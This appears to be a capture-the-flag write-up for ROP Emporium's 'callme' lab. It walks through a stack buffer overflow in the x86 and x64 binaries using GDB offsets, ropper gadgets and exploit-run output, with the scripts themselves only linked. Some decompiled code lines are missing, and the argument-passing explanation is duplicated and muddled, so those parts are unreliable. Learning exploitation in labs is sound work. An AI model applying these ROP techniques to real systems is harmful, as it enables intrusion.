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Binary Exploitation

Source: ROP Emporium

Name: Callme (x86 & x64)

Description: You must call the callme_one(), callme_two() and callme_three() functions in that order, each with the arguments 0xdeadbeef, 0xcafebabe, 0xd00df00d e.g. callme_one(0xdeadbeef, 0xcafebabe, 0xd00df00d) to print the flag. For the x86_64 binary double up those values, e.g. callme_one(0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)

Basic File Checks

└─$ file callme32 
callme32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/, for GNU/Linux 3.2.0, BuildID[sha1]=3ca5cba17bcd8926f0cda98986ef619c55023b6d, not stripped
└─$ checksec --file=callme32 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   RW-RUNPATH   75 Symbols        No    0               3               callme32

We’re working with a x86 binary and the protections enabled is just NX

I’ll run the binary to get an overview of what it does

└─$ ./callme 
callme by ROP Emporium

Hope you read the instructions...

> lol
Thank you!


So it prints out some words then asks for input then exits after we give it input

Decompiling using ghidra i’ll read the main function

undefined8 main(void)

  setvbuf(stdout,(char *)0x0,2,0);
  puts("callme by ROP Emporium");
  return 0;

So the main function calls the pwnme() function

Here’s the decompiled pwnme function

void pwnme(void)

  undefined input [32];
  puts("Hope you read the instructions...\n");
  printf("> ");
  puts("Thank you!");

So reading the code we get the vulnerability that is in it, it reads 0x200 bytes of data into a 32 bytes input buffer

With this we have extra bytes which will cause an overflow

Looking through the code i get another function called usefulFunction

void usefulFunction(void)

                    /* WARNING: Subroutine does not return */

So it calls the callme_* function

Now from the description we know that out goal is to

1. Overwrite the return address to call the callme functions
2. Pass in the valid arguments when the function is called

Time to get the offset

I’ll get the offset the way i did it in Ret2Win

└─$ gdb -q callme32 
GEF for linux ready, type `gef' to start, `gef config' to configure
90 commands loaded and 5 functions added for GDB 12.1 in 0.00ms using Python engine 3.11
Reading symbols from callme32...
(No debugging symbols found in callme32)
gef➀  disass pwnme
Dump of assembler code for function pwnme:
   0x080486ed <+0>:     push   ebp
   0x080486ee <+1>:     mov    ebp,esp
   0x080486f0 <+3>:     sub    esp,0x28
   0x080486f3 <+6>:     sub    esp,0x4
   0x080486f6 <+9>:     push   0x20
   0x080486f8 <+11>:    push   0x0
   0x080486fa <+13>:    lea    eax,[ebp-0x28]
   0x080486fd <+16>:    push   eax
   0x080486fe <+17>:    call   0x8048540 <memset@plt>
   0x08048703 <+22>:    add    esp,0x10
   0x08048706 <+25>:    sub    esp,0xc
   0x08048709 <+28>:    push   0x8048848
   0x0804870e <+33>:    call   0x8048500 <puts@plt>
   0x08048713 <+38>:    add    esp,0x10
   0x08048716 <+41>:    sub    esp,0xc
   0x08048719 <+44>:    push   0x804886b
   0x0804871e <+49>:    call   0x80484d0 <printf@plt>
   0x08048723 <+54>:    add    esp,0x10
   0x08048726 <+57>:    sub    esp,0x4
   0x08048729 <+60>:    push   0x200
   0x0804872e <+65>:    lea    eax,[ebp-0x28]
   0x08048731 <+68>:    push   eax
   0x08048732 <+69>:    push   0x0
   0x08048734 <+71>:    call   0x80484c0 <read@plt>
   0x08048739 <+76>:    add    esp,0x10
   0x0804873c <+79>:    sub    esp,0xc
   0x0804873f <+82>:    push   0x804886e
   0x08048744 <+87>:    call   0x8048500 <puts@plt>
   0x08048749 <+92>:    add    esp,0x10
   0x0804874c <+95>:    nop
   0x0804874d <+96>:    leave  
   0x0804874e <+97>:    ret    
End of assembler dump.
gef➀  b *pwnme+96
Breakpoint 1 at 0x804874d
gef➀  r
Starting program: /home/mark/Desktop/BofLearn/Challs/RopEmperium/callme/32bits/callme32 
[*] Failed to find objfile or not a valid file format: [Errno 2] No such file or directory: 'system-supplied DSO at 0xf7fc7000'
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/".
callme by ROP Emporium

Hope you read the instructions...

> pwnerhacker
Thank you!

Breakpoint 1, 0x0804874d in pwnme ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax   : 0xb       
$ebx   : 0xf7e1cff4  β†’  0x0021cd8c
$ecx   : 0xf7e1e9b8  β†’  0x00000000
$edx   : 0x1       
$esp   : 0xffffcff0  β†’  "pwnerhacker\n"
$ebp   : 0xffffd018  β†’  0xffffd028  β†’  0x00000000
$esi   : 0x80487a0  β†’  <__libc_csu_init+0> push ebp
$edi   : 0xf7ffcb80  β†’  0x00000000
$eip   : 0x804874d  β†’  <pwnme+96> leave 
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffcff0β”‚+0x0000: "pwnerhacker\n"      ← $esp
0xffffcff4β”‚+0x0004: "rhacker\n"
0xffffcff8β”‚+0x0008: "ker\n"
0xffffcffcβ”‚+0x000c: 0x00000000
0xffffd000β”‚+0x0010: 0x00000000
0xffffd004β”‚+0x0014: 0x00000000
0xffffd008β”‚+0x0018: 0x00000000
0xffffd00cβ”‚+0x001c: 0x00000000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
    0x8048744 <pwnme+87>       call   0x8048500 <puts@plt>
    0x8048749 <pwnme+92>       add    esp, 0x10
    0x804874c <pwnme+95>       nop    
 β†’  0x804874d <pwnme+96>       leave  
    0x804874e <pwnme+97>       ret    
    0x804874f <usefulFunction+0> push   ebp
    0x8048750 <usefulFunction+1> mov    ebp, esp
    0x8048752 <usefulFunction+3> sub    esp, 0x8
    0x8048755 <usefulFunction+6> sub    esp, 0x4
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "callme32", stopped 0x804874d in pwnme (), reason: BREAKPOINT
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x804874d β†’ pwnme()
[#1] 0x80486d0 β†’ main()
gef➀  search-pattern pwnerhacker
[+] Searching 'pwnerhacker' in memory
[+] In '[stack]'(0xfffdd000-0xffffe000), permission=rw-
  0xffffcff0 - 0xffffcffd  β†’   "pwnerhacker\n" 
gef➀  i f
Stack level 0, frame at 0xffffd020:
 eip = 0x804874d in pwnme; saved eip = 0x80486d0
 called by frame at 0xffffd040
 Arglist at 0xffffd018, args: 
 Locals at 0xffffd018, Previous frame's sp is 0xffffd020
 Saved registers:
  ebp at 0xffffd018, eip at 0xffffd01c

So doing the math we get the offset 0xffffd01c - 0xffffcff0 = 0x2c

Cool with that here’s what i’ll do

Since we have 3 functions which requires 3 arguments i can’t just pass them to the stack cause it will overwrite some values of the stack

Here’s the way argument are passed onto the stack

x86 elf architecture, arguments are passed onto the stack

x86 elf architecture, arguments are passed onto the stack

| 8 Byte Register | Lower 4 Bytes | Lower 2 Bytes | Lower Byte |
|   rbp           |     ebp       |     bp        |     bpl    |
|   rsp           |     esp       |     sp        |     spl    |
|   rip           |     eip       |               |            |
|   rax           |     eax       |     ax        |     al     |
|   rbx           |     ebx       |     bx        |     bl     |
|   rcx           |     ecx       |     cx        |     cl     |
|   rdx           |     edx       |     dx        |     dl     |
|   rsi           |     esi       |     si        |     sil    |
|   rdi           |     edi       |     di        |     dil    |
|   r8            |     r8d       |     r8w       |     r8b    |
|   r9            |     r9d       |     r9w       |     r9b    |
|   r10           |     r10d      |     r10w      |     r10b   |
|   r11           |     r11d      |     r11w      |     r11b   |
|   r12           |     r12d      |     r12w      |     r12b   |
|   r13           |     r13d      |     r13w      |     r13b   |
|   r14           |     r14d      |     r14w      |     r14b   |
|   r15           |     r15d      |     r15w      |     r15b   |

So basically since we’re passing in 3 arguments, the registers needed should pop 3 values off the stack

I can get that with ropper

└─$ ropper --file callme32 --search "pop"    
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop

[INFO] File: callme32
0x080487fb: pop ebp; ret; 
0x080487f8: pop ebx; pop esi; pop edi; pop ebp; ret; 
0x080484ad: pop ebx; ret; 
0x080487fa: pop edi; pop ebp; ret; 
0x080487f9: pop esi; pop edi; pop ebp; ret; 
0x08048810: pop ss; add byte ptr [eax], al; add esp, 8; pop ebx; ret; 
0x080486ea: popal; cld; ret; 

Seems 0x080487f9: pop esi; pop edi; pop ebp; ret; will work

I’ll get the corresponding callme addresses using gdb

└─$ gdb -q callme32
GEF for linux ready, type `gef' to start, `gef config' to configure
90 commands loaded and 5 functions added for GDB 12.1 in 0.00ms using Python engine 3.11
Reading symbols from callme32...
(No debugging symbols found in callme32)
gef➀  disass usefulFunction
Dump of assembler code for function usefulFunction:
   0x0804874f <+0>:     push   ebp
   0x08048750 <+1>:     mov    ebp,esp
   0x08048752 <+3>:     sub    esp,0x8
   0x08048755 <+6>:     sub    esp,0x4
   0x08048758 <+9>:     push   0x6
   0x0804875a <+11>:    push   0x5
   0x0804875c <+13>:    push   0x4
   0x0804875e <+15>:    call   0x80484e0 <callme_three@plt>
   0x08048763 <+20>:    add    esp,0x10
   0x08048766 <+23>:    sub    esp,0x4
   0x08048769 <+26>:    push   0x6
   0x0804876b <+28>:    push   0x5
   0x0804876d <+30>:    push   0x4
   0x0804876f <+32>:    call   0x8048550 <callme_two@plt>
   0x08048774 <+37>:    add    esp,0x10
   0x08048777 <+40>:    sub    esp,0x4
   0x0804877a <+43>:    push   0x6
   0x0804877c <+45>:    push   0x5
   0x0804877e <+47>:    push   0x4
   0x08048780 <+49>:    call   0x80484f0 <callme_one@plt>
   0x08048785 <+54>:    add    esp,0x10
   0x08048788 <+57>:    sub    esp,0xc
   0x0804878b <+60>:    push   0x1
   0x0804878d <+62>:    call   0x8048510 <exit@plt>
End of assembler dump.

Here’s the exploit script Exploit

On running it

└─$ python
[+] Starting local process '/home/mark/Desktop/BofLearn/Challs/RopEmperium/callme/32bits/callme32': pid 203683
[*] Switching to interactive mode
[*] Process 'callme32' stopped with exit code 0 (pid 203683)
Thank you!
callme_one() called correctly
callme_two() called correctly
[*] Got EOF while reading in interactive

Here’s the autopwn script using ROP Autopwn

It automates the stress 😭😭 but its cool πŸ™‚

On running it we get the flag

└─$ python3 
[+] Starting local process '/home/mark/Desktop/BofLearn/Challs/RopEmperium/callme/32bits/callme32': pid 208792
[*] Loaded 10 cached gadgets for './callme32'
[+] callme_one() called correctly
[+] callme_two() called correctly
[+] ROPE{a_placeholder_32byte_flag!}
[*] Process '/home/mark/Desktop/BofLearn/Challs/RopEmperium/callme/32bits/callme32' stopped with exit code 0 (pid 208792)

So for the x64 binary the approach is similar but this time we need to pass in the argument in the correct register

└─$ ropper --file callme --search "pop rdi" 
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi

[INFO] File: callme
0x000000000040093c: pop rdi; pop rsi; pop rdx; ret; 
0x00000000004009a3: pop rdi; ret; 

The first one will work fine

Here’s the exploit script Exploit

On running it

└─$ python 
[+] Starting local process '/home/mark/Desktop/BofLearn/Challs/RopEmperium/callme/64bits/callme': pid 217944
[+] callme_one() called correctly
[+] callme_two() called correctly
[+] ROPE{a_placeholder_64byte_flag!}
[*] Process '/home/mark/Desktop/BofLearn/Challs/RopEmperium/callme/64bits/callme' stopped with exit code 0 (pid 217944)

it worked. Here’s the autopwn script Autopwn

Running it works also

└─$ python
[+] Starting local process '/home/mark/Desktop/BofLearn/Challs/RopEmperium/callme/64bits/callme': pid 220794
[*] Loaded 17 cached gadgets for './callme'
[+] callme_one() called correctly
[*] callme_two() called correctly
[*] ROPE{a_placeholder_64byte_flag!}

And we’re done

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